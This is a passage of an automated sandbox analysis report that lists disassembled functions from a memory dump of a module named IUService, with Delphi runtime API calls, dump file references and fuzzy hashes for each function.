                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002154A
                                                                                                                                            • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValue.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021553
                                                                                                                                              • Part of subcall function 50021408: @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50021577,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002156A
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%Sysutils@$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FreeFromMem$qqrpvPower10$qqrvSystem@T$us$i0$%T$us$i0$%pbusTextValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3332700872-0
                                                                                                                                            • Opcode ID: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                                                            • Instruction ID: d635544f2e29b8d36e0ff77d7db167ac281d6be62c4688162a595b10ac468aae
                                                                                                                                            • Opcode Fuzzy Hash: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                                                            • Instruction Fuzzy Hash: 4EF05C31705244ABE304DAA5FC22A5DF6DDDFDA240FE10176F504D3341D9309E018290
                                                                                                                                            Function 50026668 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026677
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 50026695
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 500266A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1550118436-0
                                                                                                                                            • Opcode ID: 7999dc591e2fe863dded708c101b128678d951501262c20680e16ba129308214
                                                                                                                                            • Instruction ID: 6d5eb7f83aa1e2fd7c5966daae1cddd1a1bec88c9349280672d0eb764180ee1f
                                                                                                                                            • Opcode Fuzzy Hash: 7999dc591e2fe863dded708c101b128678d951501262c20680e16ba129308214
                                                                                                                                            • Instruction Fuzzy Hash: B6F02771201585AFE701C6A4ED66C5EB7ADDB8AA50F914773F90493250EB319E05C1D0
                                                                                                                                            Function 50011068 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5001106D
                                                                                                                                            • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 50011080
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011090
                                                                                                                                            • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 500110C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$CategoryCheckPunctuation$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 484436152-0
                                                                                                                                            • Opcode ID: 52ede1bb95d7295b06e80802bbd38fe83311b756c692b49ea5d382278e8cd971
                                                                                                                                            • Instruction ID: 7d71bda536cb03520909d9fae99c602a8809cf4c5d9d924bc7c1391ccae14e08
                                                                                                                                            • Opcode Fuzzy Hash: 52ede1bb95d7295b06e80802bbd38fe83311b756c692b49ea5d382278e8cd971
                                                                                                                                            • Instruction Fuzzy Hash: FFF0B490B154A00BD3148761EC6167433E2A799306749417EF487CFA97DB3985E9E720
                                                                                                                                            Function 50035408 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035418
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003545E,?,?,?,?), ref: 50035430
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(?,?,?,?), ref: 50035443
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035465,?), ref: 50035458
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitStr$qqrr17Stringrx8System@VariantWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 624794194-0
                                                                                                                                            • Opcode ID: 6b63245a20f1eb38ffd970ee5c0938cccb914511c5db392fd5e623de6624604f
                                                                                                                                            • Instruction ID: bfc4515f3b2110e8e2ff6e1677464bd507c6d1f87ba6beb108f7212765f465d6
                                                                                                                                            • Opcode Fuzzy Hash: 6b63245a20f1eb38ffd970ee5c0938cccb914511c5db392fd5e623de6624604f
                                                                                                                                            • Instruction Fuzzy Hash: 14F0EC3091069D8FCB06CBA4EC428EEB3ACEF49211B810A33F510D2260FA34A90086A4
                                                                                                                                            Function 500114F4 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500114F9
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 5001150C
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5001151C
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 50011555
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$CategoryCheckSymbol$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 691609695-0
                                                                                                                                            • Opcode ID: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                                                            • Instruction ID: 7b396b0d8ffb9378e5810028f15ef3c5548f1d5ddace2a8aa8357158f6fe202e
                                                                                                                                            • Opcode Fuzzy Hash: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                                                            • Instruction Fuzzy Hash: 37F0BE91B154A04BD31887A1EC6127533E367D531274841BEF487CB2A3DB38C9E9E660
                                                                                                                                            Function 50035AF4 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035B04
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,50035B4A,?,?,?,?), ref: 50035B1C
                                                                                                                                            • @Variants@@VarToUStr$qqrr20System@UnicodeStringrx8TVarData.RTL120(?,?,?,?), ref: 50035B2F
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035B51,?), ref: 50035B44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitStr$qqrr20Stringrx8System@UnicodeVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1468330936-0
                                                                                                                                            • Opcode ID: 06cfeee0a6fcf60786b3d31dc2246aab1179ed64e64cdb3810cc65447ef0e45c
                                                                                                                                            • Instruction ID: be030533f1588a6be419db2ab8460c97b0700afb37878b8d6ee957e60b2b799b
                                                                                                                                            • Opcode Fuzzy Hash: 06cfeee0a6fcf60786b3d31dc2246aab1179ed64e64cdb3810cc65447ef0e45c
                                                                                                                                            • Instruction Fuzzy Hash: DDF08C319246999FDB16DBA4EC528EEB3ACFF49211B810E73E510D3261FA34A90486A4
                                                                                                                                            Function 500344B8 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500344C5
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003450D,?,?,?), ref: 500344DD
                                                                                                                                            • @Variants@@VarToCurrency$qqrrx8TVarData.RTL120(?,?,?), ref: 500344EE
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50034514), ref: 50034507
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Currency$qqrrx8Datarx8InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1713342866-0
                                                                                                                                            • Opcode ID: 3efc4c1ad2f43dd0215f2279f02a42f5a7e342c056d454846f2bae73d598f174
                                                                                                                                            • Instruction ID: 5620bf7c574489ee796bacc82eac129a3000f09d483f2d7356d93e916d1d5bd1
                                                                                                                                            • Opcode Fuzzy Hash: 3efc4c1ad2f43dd0215f2279f02a42f5a7e342c056d454846f2bae73d598f174
                                                                                                                                            • Instruction Fuzzy Hash: F1F082309059899FCB42DBE4EC428EEBBBCEF48600F810633E600D2591EA34A946C694
                                                                                                                                            Function 500226AC Relevance: 6.0, APIs: 4, Instructions: 31timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@DecodeDate$qqrx16System@TDateTimerust2t2.RTL120(?,?), ref: 500226C4
                                                                                                                                              • Part of subcall function 500224F0: @Sysutils@DecodeDateFully$qqrx16System@TDateTimerust2t2t2.RTL120(?,?,5001D662,?,?,?,5001D662,?,?), ref: 50022503
                                                                                                                                            • @Sysutils@IncAMonth$qqrrust1t1i.RTL120(?,?,?), ref: 500226D3
                                                                                                                                              • Part of subcall function 50022708: @Sysutils@IsLeapYear$qqrus.RTL120 ref: 50022767
                                                                                                                                            • @Sysutils@EncodeDate$qqrususus.RTL120(?,?,?), ref: 500226E4
                                                                                                                                              • Part of subcall function 50022374: @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120 ref: 50022387
                                                                                                                                            • @Sysutils@ReplaceTime$qqrr16System@TDateTimex16System@TDateTime.RTL120(?,?,?,?,?), ref: 500226F6
                                                                                                                                              • Part of subcall function 50022798: @System@@TRUNC$qqrv.RTL120 ref: 500227A3
                                                                                                                                              • Part of subcall function 50022798: @System@Frac$qqrxg.RTL120 ref: 500227CC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$DateSystem@$DecodeEncodeTime$C$qqrvDate$qqrusususDate$qqrusususr16Date$qqrx16Frac$qqrxgFully$qqrx16LeapMonth$qqrrust1t1iReplaceSystem@@Time$qqrr16Timerust2t2Timerust2t2t2Timex16Year$qqrus
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4205208091-0
                                                                                                                                            • Opcode ID: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                                                            • Instruction ID: 90397f2099132ae17983f43b1299ad6055f1b282f2460c1bcfdd474071a034a8
                                                                                                                                            • Opcode Fuzzy Hash: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                                                            • Instruction Fuzzy Hash: 15F0A97180510FBACF009FD1E9818ECBBB9FF54219F408692F85465151EB32A769D794
                                                                                                                                            Function 5002D730 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D4E0: @System@@DynArrayLength$qqrv.RTL120(?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4E8
                                                                                                                                              • Part of subcall function 5002D4E0: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(00000000,?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4F4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                                                              • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                                                              • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Sysutils@$Exception@$bctr$qqrp20String$ArrayExcept$qqrvRaise$DynamicLength$qqrvSystem@%$Encoding@Recpx14Recxi$ByteCount$qqrx24$Array$tb%ii$Array$tb%Array$tb%iir25Array$tuc%iBytes$qqrx24Length$qqrrpvpvipi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2407772116-0
                                                                                                                                            • Opcode ID: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                                                            • Instruction ID: 9aaef7661f88e341657fce88e442fcf8159dd86dd4df8b5ba2cc1c183d9f0c43
                                                                                                                                            • Opcode Fuzzy Hash: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                                                            • Instruction Fuzzy Hash: BAE04F6170615427E21462AEBC42E3BA6CEC7D8A21F50413BBA09C7352DCA5EC0242E4
                                                                                                                                            Function 5003298C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 50032999
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,500329E3,?,00000000,?), ref: 500329B1
                                                                                                                                            • @Variants@@VarToInt64$qqrrx8TVarData.RTL120(?,00000000,?), ref: 500329C2
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500329EA), ref: 500329DD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
